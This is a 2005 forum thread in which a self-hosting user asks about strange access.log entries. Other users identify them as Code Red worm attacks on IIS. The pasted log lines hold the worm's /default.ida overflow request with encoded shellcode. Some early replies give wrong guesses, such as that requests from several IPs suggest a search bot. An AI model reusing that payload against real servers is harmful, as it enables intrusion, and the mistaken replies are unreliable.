Strange entries into access.log

[gopo]

Hi guys,

 

I have no idea if this is the place to ask, so you'll have to forgive me.

I'm hosting my domain with my computer and uniformServer as... server.

 

Today while reading access.log (just pure curiosrity) I observed some really strange entries into the log. If necessary I can post all entries I'm talking about, but for now I will just post a fragment.

I can see in the error.log that the requests are treated either as "File does not exist" or "URI too long". Never the less, is someone trying to atack the server or what?

Here's a fragment:

>> 211.158.113.35 - - [23/Mar/2005:20:02:10 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u

6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u

00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323

 

>> 222.91.35.92 - - [23/Mar/2005:20:10:49 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%

ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%

u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323

 

>>216.251.92.99 - - [23/Mar/2005:20:18:30 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%

u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%

u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323

 

There are few some are really really long, looking like "x90\x02\xb1\x02\xb1\x".

 

Any ideas? Do you know what deault.ida might be? There is no such file on my server.

[olajideolaolorun]

Hmm.. It could be a hacker or a bot. It may also not be it if it is occuring from different IPs. If it is happening from different IPs, then it is not a hacker, but could be a search bot or something like that...

[olajideolaolorun]

The IP you used to post this topic refers to Google... hmm...

 

"...out of ideas..."

[AlleyKat]

Except for the file name it rather looks like the Santy-worm that attacks phpBB boards - my guess is that those are hacking attempts, from either an actual hacker or from hacked PCs.

[AlleyKat]

http://www.thesitewizard.com/news/coderediiworm.shtml

 

Its CodeRed worm attacks.

[olajideolaolorun]

Wow.... learning something new everyday.. seems like it is only unsafe for IIS LOL

[kermit]

you should see my server logs... omfg, they're full of crap like that..

 

i dont care so much about those, that's what debian and apache are for.

 

but the scumbags who work for the riaa and their web crawlers that disobey or ignore robots.txt, and hammer away at a site as fast as they can.. i have a nifty, slow-loading, little infinite bot trap black hole for them, and the worst ones get filtered at the firewall instead. am looking at a dynamic robots.txt though, i saw a site that has an example in perl, it's pretty sweet.. ahh, here it is.. a little outdated, but it gives me a place to start... http://www.leekillough.com/robots.html

[olajideolaolorun]

Not bad